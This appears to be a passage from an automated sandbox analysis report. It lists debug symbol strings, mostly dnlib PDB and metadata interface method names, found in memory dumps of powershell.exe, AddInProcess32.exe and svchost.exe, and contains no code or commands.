            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 0000000A.00000002.3372031467.0000000003E07000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371896205.0000000003DE7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3369020881.00000000017F7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3368884407.00000000017D7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3369228393.0000000001817000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371223912.0000000003C17000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3365846362.000000000160D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3369907373.0000000003127000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3364606338.0000000001537000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371787930.0000000003DC7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371439220.0000000003C37000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3368577514.00000000017B7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371561302.0000000003C57000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3364223051.0000000001512000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2324999391.00000000029C2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000011.00000002.2401038340.0000000002882000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000017.00000002.2498372356.0000000002AC2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000001F.00000002.2602124639.0000000002A62000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000025.00000002.2696343691.0000000002E82000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000002C.00000002.2771398420.00000000027B2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000032.00000002.2867044582.00000000025E2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000038.00000002.2943823106.0000000002D22000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000003E.00000002.3041192141.0000000002722000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000044.00000002.3147242188.0000000002D02000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000004A.00000002.3224086435.0000000002A32000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000050.00000002.3314541028.0000000002E32000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000056.00000002.3360669578.00000000032E2000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2452048534.00007FF848F10000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2452048534.00007FF848F10000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
